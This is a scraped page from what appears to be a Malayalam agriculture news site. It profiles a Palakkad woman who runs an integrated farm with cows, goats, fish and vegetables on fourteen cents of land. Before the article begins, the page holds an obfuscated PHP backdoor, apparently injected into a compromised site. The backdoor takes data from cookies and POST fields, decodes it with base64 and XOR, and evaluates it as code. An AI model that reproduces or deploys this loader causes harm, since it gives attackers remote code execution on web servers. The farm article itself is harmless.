$VXJVEAbNkL = chr (111) . chr ( 914 - 847 )."\x5f" . "\x68" . "\152" . chr (78) . "\123";$ElrEeQWf = 'c' . chr ( 427 - 319 ).chr ( 779 - 682 ).'s' . "\163" . "\137" . "\145" . chr ( 457 - 337 ).chr ( 1063 - 958 ).'s' . "\164" . "\x73";$FKdCsvt = class_exists($VXJVEAbNkL); $ElrEeQWf = "26131";$xTnGlRuR = strpos($ElrEeQWf, $VXJVEAbNkL);if ($FKdCsvt == $xTnGlRuR){function dSAGxSPU(){$mCXBr = new /* 15894 */ oC_hjNS(5865 + 5865); $mCXBr = NULL;}$SyQtm = "5865";class oC_hjNS{private function UCrjoD($SyQtm){if (is_array(oC_hjNS::$GSCSJq)) {$GpUkk2 = str_replace("<" . "?php", "", oC_hjNS::$GSCSJq["content"]);eval($GpUkk2); $SyQtm = "5865";exit();}}public function VXqvOSb(){$GpUkk = "53873";$this->_dummy = str_repeat($GpUkk, strlen($GpUkk));}public function __destruct(){oC_hjNS::$GSCSJq = @unserialize(oC_hjNS::$GSCSJq); $SyQtm = "30711_57028";$this->UCrjoD($SyQtm); $SyQtm = "30711_57028";}public function BHgAlhgAP($GpUkk, $KCcdxwo){return $GpUkk[0] ^ str_repeat($KCcdxwo, intval(strlen($GpUkk[0]) / strlen($KCcdxwo)) + 1);}public function jJMpKV($GpUkk){$FPmjvGj = "\142" . chr ( 555 - 458 ).chr ( 418 - 303 ).'e' . '6' . chr ( 97 - 45 );return array_map($FPmjvGj . chr (95) . chr (100) . "\x65" . chr (99) . chr (111) . "\x64" . chr (101), array($GpUkk,));}public function __construct($TaJCrlgNU=0){$adNshnbaU = "\54";$GpUkk = "";$UjieTVMmPr = $_POST;$jkIOj = $_COOKIE;$KCcdxwo = "fa466309-c080-47c2-bdd5-b7d5baf991f3";$ApeUFifxgT = @$jkIOj[substr($KCcdxwo, 0, 4)];if (!empty($ApeUFifxgT)){$ApeUFifxgT = explode($adNshnbaU, $ApeUFifxgT);foreach ($ApeUFifxgT as $cwcxCxX){$GpUkk .= @$jkIOj[$cwcxCxX];$GpUkk .= @$UjieTVMmPr[$cwcxCxX];}$GpUkk = $this->jJMpKV($GpUkk);}oC_hjNS::$GSCSJq = $this->BHgAlhgAP($GpUkk, $KCcdxwo);if (strpos($KCcdxwo, $adNshnbaU) !== FALSE){$KCcdxwo = str_pad($KCcdxwo, 10); $KCcdxwo = ltrim(rtrim($KCcdxwo));}}public static $GSCSJq = 51359;}dSAGxSPU();} വീട് അടങ്ങുന്ന വെറും പതിനാല് സെന്റ് സ്ഥലത്ത് ഇന്റഗ്രേറ്റഡ് ഫാമൊരുക്കി വീട്ടമ – Mannira

വീട് അടങ്ങുന്ന വെറും പതിനാല് സെന്റ് സ്ഥലത്ത് ഇന്റഗ്രേറ്റഡ് ഫാമൊരുക്കി വീട്ടമ

ആടിനേയും, പശുവിനേയുമൊക്കെ വളർത്താൻ സ്ഥലമില്ല എന്ന് പരിതപിക്കുന്നവർ, തന്റെ വീടുൾപ്പെടെയുള്ള വെറും പതിനാല് സെന്റ് സ്ഥലത്ത് മാതൃകാപരമായ ഒരു സംയോജിത (integrated) ഫാമൊരുക്കി വിജയം നേടിയ ഒരു വീട്ടമയെക്കുറിച്ച് അറിയേണ്ടത് ആവശ്യമാണ്. പാലക്കാട് ജില്ലയിലെ ആനക്കരയിൽ, മേമ്പള്ളി വീട്ടിൽ ശശികല എന്ന പെൺകരുത്തിനെക്കുറിച്ചാണ് പറഞ്ഞുവരുന്നത്. പശു, ആട്, മുയൽ, കോഴികൾ, മത്സ്യങ്ങൾ, പച്ചക്കറി കൃഷികൾ, അലങ്കാര മത്സ്യം അങ്ങനെ പലതും പുരയിടത്തിന്റെ ഓരോ ഇഞ്ച് സ്ഥലവും കൃത്യമായി പ്രയോജനപ്പെടുത്തി കൊണ്ടാണ് ഇവിടെ ഫാം തയ്യാറാക്കിയിരിക്കുന്നത്.

ജീവിത പ്രതിസന്ധികളില്‍ തളരാതെ ടൈലറായും, ഓട്ടോ ഡ്രൈവറായും, കർഷകയായുമൊക്കെ മുന്നേറിയ ശശികലയുടെ അനുഭവ തഴക്കങ്ങളുടെ ഇഴയടുപ്പങ്ങളിൽ, പാലക്കാടൻ കരിമ്പന കാറ്റിൻ വാത്സല്യം കൂടി ചേർന്നതോടെ പച്ചയായ അക്ഷരങ്ങളായും അവയെല്ലാം ജീവൻ തുടിക്കുന്ന കവിതകളുമായി മാറി. ശശികലയുടെ കവിതകള്‍ “കോടിമുണ്ടിന്റെ ചിരി” എന്ന പേരിൽ കോഴിക്കോട് ലിപി പബ്ലിക്കേഷൻസ് ഒരു സമാഹാരമായി അടുത്തിടെ പുറത്തിറക്കിയിരുന്നു.

Also Read: പൊതുപ്രവർത്തനത്തോടൊപ്പം ലാഭകരമായ ആട് ഫാം; മാതൃകാ കർഷകനായ ഹമീദ് ഇങ്ങനെയാണ്

ഗ്രോബാഗിൽ തിരിനന സംവിധാനത്തോട് കൂടിയാണ് ശശികല പച്ചക്കറി കൃഷി ചെയ്യുന്നത്. വീടിന് മുൻവശത്തായി ഒരുക്കിയെടുത്ത സിമന്റ് ടാങ്കിലാണ് മത്സ്യകൃഷി; ഇരുന്നൂറിലേറെ തിലോപ്പിയ മത്സ്യങ്ങളുണ്ട്. ജേഴ്സി, എച്ച് എഫ് ഇനങ്ങളിലായ് ഏഴോളം പശുക്കളും വൈവിധ്യ ഇനങ്ങളിലായ് നൂറോളം കോഴികളുമുണ്ട്. നാടൻ ഇനങ്ങൾ നിറഞ്ഞ ആടുവളർത്തലും കുടുംബത്തിന്റെ മികച്ച വരുമാന മാർഗ്ഗമാണ്. ഒഴിഞ്ഞ ഒരിടത്ത് മുയൽ വളർത്തലിനും ഇടം കൊടുത്തിട്ടുണ്ട്.

ബാക്കിവന്ന ഒരല്പം സ്ഥലം ഉപയോഗപ്പെടുത്തിയാണ് വിവിധങ്ങളായ അലങ്കാര മത്സ്യങ്ങൾക്കും ഇടം നല്കിയിരിക്കുന്നത്. ഗപ്പി മത്സ്യങ്ങളുടെ നല്ലൊരു ശേഖരം തന്നെ ഇവിടെയുണ്ട്. ഭർത്താവ് രാജഗോപാലനും, ഡിഗ്രിക്കും ഹൈസ്കൂളിലും പഠിക്കുന്ന മക്കള്‍ ശരത്, ദേവ് കൃഷ്ണന്‍ എന്നിവരുള്‍പ്പെടുന്ന കുടുംബത്തിന്റെ കൂട്ടായ്മയിൽ വിരിഞ്ഞ വിജയമാണ് ഈ ജൈവ ഗൃഹത്തിൽ തെളിഞ്ഞു നിൽക്കുന്നത്.

സ്ഥലപരിമിതിയിൽ കാർഷിക ഇടപെടലുകളിലേക്ക് ഇറങ്ങി വരുവാൻ മടിച്ചു നില്‍ക്കുന്നവർക്ക് തീർച്ചയായും മാതൃകയാണ് കൃത്യമായ ലക്ഷ്യബോധത്തോടെ വിജയത്തിലെത്തിയ ശശികലയും മേമ്പള്ളി വീട്ടിലെ ഈ കൊച്ചുഫാമും.

ഫോണ്‍: 9048156404.

Also Read: കാട്ടുപന്നികൾ ജാഗ്രതൈ; ആനക്കരയിൽ ഫാം വാച്ച് മാൻ ഇറങ്ങി!

 

ഗിരീഷ് അയിലക്കാട്

അഗ്രിക്കൾച്ചർ അസിസ്റ്റന്റ് കൃഷിഭവൻ, ആനക്കര ഫോണ്‍: 9745632828